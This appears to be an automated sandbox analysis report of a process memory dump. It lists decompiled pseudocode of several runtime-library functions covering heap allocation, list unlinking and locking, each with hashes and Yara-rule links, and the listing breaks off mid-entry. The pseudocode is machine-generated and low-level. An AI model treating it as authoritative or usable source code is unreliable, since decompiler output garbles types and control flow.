                                          0x034720a5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f9fcf8f8557ad82509dc6e9165c6f77ca1a5d0a34f75dd3731ec5e0b7577d27
                                          • Instruction ID: b409f82b6a36f5aa320a1727c57ad3819650718615b9d8fdbefd763cdb525c8b
                                          • Opcode Fuzzy Hash: 9f9fcf8f8557ad82509dc6e9165c6f77ca1a5d0a34f75dd3731ec5e0b7577d27
                                          • Instruction Fuzzy Hash: 7321A533A104159B9718CF7CC8055A6F7E6EF9C22032B467BD952EB265DA70BD11CA84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03427794, Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E03427794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3497b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E033EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E033C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E033E9AE0();
					_t24 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                          0x03427799
                                          0x0342779a
                                          0x0342779b
                                          0x034277a3
                                          0x034277ab
                                          0x034277ae
                                          0x034277b1
                                          0x034277b1
                                          0x034277bf
                                          0x034277c4
                                          0x034277c8
                                          0x034277ce
                                          0x034277d4
                                          0x034277e0
                                          0x034277e0
                                          0x034277d6
                                          0x034277d6
                                          0x034277de
                                          0x00000000
                                          0x00000000
                                          0x034277de
                                          0x034277e5
                                          0x034277f0
                                          0x034277f3
                                          0x034277f6
                                          0x034277fd
                                          0x03427800
                                          0x0342780c
                                          0x03427818
                                          0x0342782b
                                          0x0342781a
                                          0x03427823
                                          0x03427823
                                          0x03427830
                                          0x03427831
                                          0x03427838
                                          0x0342783d
                                          0x0342783e
                                          0x0342784f
                                          0x0342784f
                                          0x0342785a

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35b1d20ac18b54a0b11cc3b6c612e81507423ed21d493d1943691de80814053d
                                          • Instruction ID: 502f7fd320e9f18b86cbd1e15fcaefbd4b5422d3d537ef5341da8ce529dfa307
                                          • Opcode Fuzzy Hash: 35b1d20ac18b54a0b11cc3b6c612e81507423ed21d493d1943691de80814053d
                                          • Instruction Fuzzy Hash: D021AE76900654AFC725DF69DC90E6BBBB8EF88340F14056EF90ADB750D634E900CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CAE73, Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E033CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E033C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E033C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E033C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E033C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03427794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                          0x033cae78
                                          0x033cae7c
                                          0x033cae7e
                                          0x033cae81
                                          0x033cae86
                                          0x033cae8d
                                          0x03412691
                                          0x033cae93
                                          0x033cae93
                                          0x033cae93
                                          0x033cae98
                                          0x033cae9d
                                          0x034126a2
                                          0x034126b4
                                          0x034126a4
                                          0x034126ad
                                          0x034126ad
                                          0x034126b9
                                          0x00000000
                                          0x034126bb
                                          0x00000000
                                          0x034126bb
                                          0x033caea3
                                          0x033caea3
                                          0x033caea3
                                          0x033caeaa
                                          0x034126c0
                                          0x034126c9
                                          0x034126c9
                                          0x033caeb3
                                          0x034126d4
                                          0x034126e1
                                          0x00000000
                                          0x00000000
                                          0x034126e7
                                          0x034126ee
                                          0x034126f0
                                          0x034126f9
                                          0x034126f9
                                          0x03412702
                                          0x03412708
                                          0x03412708
                                          0x0341270b
                                          0x0341270f
                                          0x03412711
                                          0x03412711
                                          0x03412725
                                          0x03412725
                                          0x00000000
                                          0x033caeb9
                                          0x033caeb9
                                          0x033caebf
                                          0x033caebf
                                          0x033caeb3

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: fb8dec0cca380564510d98bf9b74b4ddb5f87e7465ba36fa927304bf0f2e0c9e
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: 2121B071A21A849FD715DB69C998B2677E8EF44240F0D04A5DD04CF7A2E774DC50C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DFD9B, Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E033DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E033B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                          0x033dfd9b
                                          0x033dfda0
                                          0x033dfda1
                                          0x033dfdab
                                          0x033dfdad
                                          0x033dfdb0
                                          0x033dfdb8
                                          0x033dfe0f
                                          0x033dfde6
                                          0x033dfde9
                                          0x033dfdec
                                          0x0341c0c0
                                          0x033dfdfe
                                          0x033dfe06
                                          0x033dfe06
                                          0x0341c0c8
                                          0x033dfe2d
                                          0x033dfe2d
                                          0x00000000
                                          0x033dfe2d
                                          0x0341c0d1
                                          0x0341c0e0
                                          0x0341c0e5
                                          0x0341c0e5
                                          0x0341c0e8
                                          0x00000000
                                          0x0341c0e8
                                          0x033dfdf4
                                          0x00000000
                                          0x00000000
                                          0x033dfdf6
                                          0x033dfdfa
                                          0x033dfe1a
                                          0x033dfe1f
                                          0x033dfe1f
                                          0x033dfdfc
                                          0x00000000
                                          0x033dfdfc
                                          0x033dfdcc
                                          0x033dfdd0
                                          0x033dfe26
                                          0x00000000
                                          0x033dfe26
                                          0x033dfdd8
                                          0x033dfddb
                                          0x033dfddd
                                          0x033dfde0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: 05d04c6d00bed3eea993db9932b3601256a1ed84c612e64031dd8c1cee42e32b
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: A0217172640644DFC731CF49D9C0A66F7E9EB94A10F24416EE9468BA28D730DD00CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B841F, Relevance: .1, Instructions: 64COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E033B841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E033E9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                          0x033b842f
                                          0x033b8448
                                          0x033b844e
                                          0x033b8459
                                          0x033b845b
                                          0x033b8464
                                          0x03409ac3
                                          0x03409ac3
                                          0x03409ac5
                                          0x03409acb
                                          0x00000000
                                          0x00000000
                                          0x03409acd
                                          0x03409acd
                                          0x03409ad1
                                          0x03409ae9
                                          0x033b846a
                                          0x033b8475
                                          0x033b8479
                                          0x033b847c
                                          0x033b8481
                                          0x033b8482
                                          0x033b849a

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction ID: a0cffe46183ef446475f0ccc6bd1d299c0f59f2ede4a3865570c121e3a2be2a3
                                          • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction Fuzzy Hash: A5219D76E00119CBCB14CFA9C580A8AF3F9FB88350FA64165E919BB751CA30AE04CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DB390, Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E033DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E033C2280(_t12, 0x3498608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E033E00C2(0x3498608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                          0x033db395
                                          0x033db3a2
                                          0x033db3a5
                                          0x033db3aa
                                          0x033db3b2
                                          0x033db3ba
                                          0x033db3bd
                                          0x033db3c0
                                          0x033db3c4
                                          0x033db3c9
                                          0x0341a3e9
                                          0x0341a3ed
                                          0x0341a3f0
                                          0x0341a3ff
                                          0x0341a403
                                          0x0341a409
                                          0x00000000
                                          0x00000000
                                          0x0341a40b
                                          0x0341a40b
                                          0x0341a40f
                                          0x0341a415
                                          0x0341a423
                                          0x0341a423
                                          0x0341a415
                                          0x033db3d1
                                          0x033db3e8
                                          0x033db3e8
                                          0x033db3d9

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e801c681d26e6808d938cdb7da1714aed8c87a40fe93aecee82d486582dee453
                                          • Instruction ID: 116143eb52d0c519a17f2797d34aafa9402bfd0fb03133004eb296e47002f630
                                          • Opcode Fuzzy Hash: e801c681d26e6808d938cdb7da1714aed8c87a40fe93aecee82d486582dee453
                                          • Instruction Fuzzy Hash: F7116B377122189FCB18CE199DC1A6BB65AEBC5370B29012EED16CF790CE719C02C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A9240, Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E033A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x347f708);
				E033FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E033E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E033E95D0();
				_t33 =  *0x34984c4; // 0x0
				L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x34984c4; // 0x0
				L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x34984c4; // 0x0
				E033C2280(L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x34986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E033E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E033E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E033A9325();
					_t50 =  *0x34984c4; // 0x0
					return E033FD0D1(L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                          0x033a9240
                                          0x033a9242
                                          0x033a9247
                                          0x033a924c
                                          0x033a924e
                                          0x033a9255
                                          0x033a9257
                                          0x033a925a
                                          0x033a925f
                                          0x033a925f
                                          0x033a9266
                                          0x033a9271
                                          0x033a9276
                                          0x033a9279
                                          0x033a927e
                                          0x033a9295
                                          0x033a929a
                                          0x033a92b1
                                          0x033a92b6
                                          0x033a92d7
                                          0x033a92dc
                                          0x033a92e0
                                          0x033a92e6
                                          0x033a92e8
                                          0x033a92ee
                                          0x033a9332
                                          0x033a9333
                                          0x033a9337
                                          0x033a9338
                                          0x033a933a
                                          0x033a933a
                                          0x033a933d
                                          0x033a9342
                                          0x033a9342
                                          0x033a9345
                                          0x033a9349
                                          0x033a934e
                                          0x033a9352
                                          0x033a9357
                                          0x033a92f4
                                          0x033a92f4
                                          0x033a92f6
                                          0x033a92f9
                                          0x033a9300
                                          0x033a9306
                                          0x033a9324
                                          0x033a9324

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2018d43a3fdcf8e5a96fa47876f3fa316deaf98791b781aac05b10fcb0dafe94
                                          • Instruction ID: 538ab287280b987795166cfae86a3a939ee520ba2bb8a0e9fa300bec1e4cd03f
                                          • Opcode Fuzzy Hash: 2018d43a3fdcf8e5a96fa47876f3fa316deaf98791b781aac05b10fcb0dafe94
                                          • Instruction Fuzzy Hash: CD217836451B44DFC721EF28CE84F5AB7F9FF18304F144569A009AA6A2DB34E941CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03434257, Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E03434257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x34808d0);
				E033FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E034341E8(__ebx, __edi, __ecx, _t39);
				E033BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x34987e4;
					_t18 =  *0x34987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3495cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x34987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x34987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L033A7055(_t31 + 0xfffffff8);
								_t24 =  *0x34987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x34987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3495cd0;
				if( *0x3495cd0 <= 0) {
					L033A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x34987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x34987e8 = _t30;
						 *0x34987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E033FD0D1(L03434320());
			}















                                          0x03434257
                                          0x03434257
                                          0x03434257
                                          0x03434259
                                          0x0343425e
                                          0x03434263
                                          0x03434265
                                          0x03434273
                                          0x03434278
                                          0x0343427c
                                          0x0343427f
                                          0x03434281
                                          0x03434287
                                          0x034342d7
                                          0x034342d7
                                          0x034342da
                                          0x0343428d
                                          0x0343428d
                                          0x0343428f
                                          0x03434292
                                          0x03434297
                                          0x0343429c
                                          0x034342a0
                                          0x034342a6
                                          0x034342a8
                                          0x034342ae
                                          0x034342b3
                                          0x00000000
                                          0x034342ba
                                          0x034342ba
                                          0x034342bf
                                          0x034342c5
                                          0x034342ca
                                          0x034342cf
                                          0x034342d0
                                          0x00000000
                                          0x034342d0
                                          0x034342b3
                                          0x00000000
                                          0x034342a6
                                          0x0343429c
                                          0x034342dc
                                          0x034342dc
                                          0x034342e3
                                          0x03434309
                                          0x034342e5
                                          0x034342e5
                                          0x034342e8
                                          0x034342ee
                                          0x034342f0
                                          0x00000000
                                          0x034342f2
                                          0x034342f2
                                          0x034342f4
                                          0x034342f7
                                          0x034342f9
                                          0x03434300
                                          0x03434300
                                          0x034342f0
                                          0x0343430e
                                          0x0343431f

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6322c5119ee6c1afa3658f753ba43fb30012e737af9925904290e2b930b7d9d4
                                          • Instruction ID: 17df55e77ed9b50ba723c37540b24535d7da6265d8c9deceee3d215ad1f05498
                                          • Opcode Fuzzy Hash: 6322c5119ee6c1afa3658f753ba43fb30012e737af9925904290e2b930b7d9d4
                                          • Instruction Fuzzy Hash: 96217974900B01CFC715EF6AD844694B7E0FB5B394B6482AFC129AF3A9DB359481CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D2397, Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E033D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x349848c != 0) {
					L033CFAD0(0x3498610);
					if( *0x349848c == 0) {
						E033CFA00(0x3498610, _t19, _t27, 0x3498610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E033D2581(0x3498610, 0x33850a0, _t26, _t27, _t28);
						E033CFA00(0x3498610, 0x33850a0, _t27, 0x3498610);
					}
				} else {
					L1:
					_t11 =  *0x3498614; // 0x0
					if(_t11 == 0) {
						_t11 = E033E4886(0x3381088, 1, 0x3498614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E033D2581(0x3498610, (_t11 << 4) + 0x3385070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                          0x033d23b0
                                          0x033d23b6
                                          0x033d2409
                                          0x033d2415
                                          0x03415ae9
                                          0x00000000
                                          0x033d241b
                                          0x033d241b
                                          0x033d241d
                                          0x033d2427
                                          0x033d242e
                                          0x033d2430
                                          0x033d2430
                                          0x033d23b8
                                          0x033d23b8
                                          0x033d23b8
                                          0x033d23bf
                                          0x033d23fc
                                          0x033d23fc
                                          0x033d23c1
                                          0x033d23c3
                                          0x033d23d0
                                          0x033d23d8
                                          0x033d23d8
                                          0x033d23dc
                                          0x033d23de
                                          0x033d23e1
                                          0x033d23e1
                                          0x033d23ec

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e857fb7c635c84c6c46562da1e627efe57cd6128b7a99c561deafaf9689c87bb
                                          • Instruction ID: 6897cdac3ebeb20f5fc27ce8619ce14eeb6a603d5cadcd512fe02c6e4b1c7365
                                          • Opcode Fuzzy Hash: e857fb7c635c84c6c46562da1e627efe57cd6128b7a99c561deafaf9689c87bb
                                          • Instruction Fuzzy Hash: 2411E577A4434467E720E72AACC0F16E6DDAB91610F18481BB902EF690D6B4D8418754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034246A7, Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E034246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E033EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E033DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L033C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                          0x034246b7
                                          0x034246ba
                                          0x034246c5
                                          0x034246c8
                                          0x034246d0
                                          0x034246d4
                                          0x034246e6
                                          0x034246e9
                                          0x034246f4
                                          0x034246ff
                                          0x03424705
                                          0x03424706
                                          0x0342470c
                                          0x03424713
                                          0x0342471b
                                          0x03424723
                                          0x03424725
                                          0x034246d6
                                          0x034246d9
                                          0x034246db
                                          0x034246db
                                          0x03424732

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 00b856af797fa21d95f92665346c639e03f8cdedf7b1b5a45f15edaa0d13dccd
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
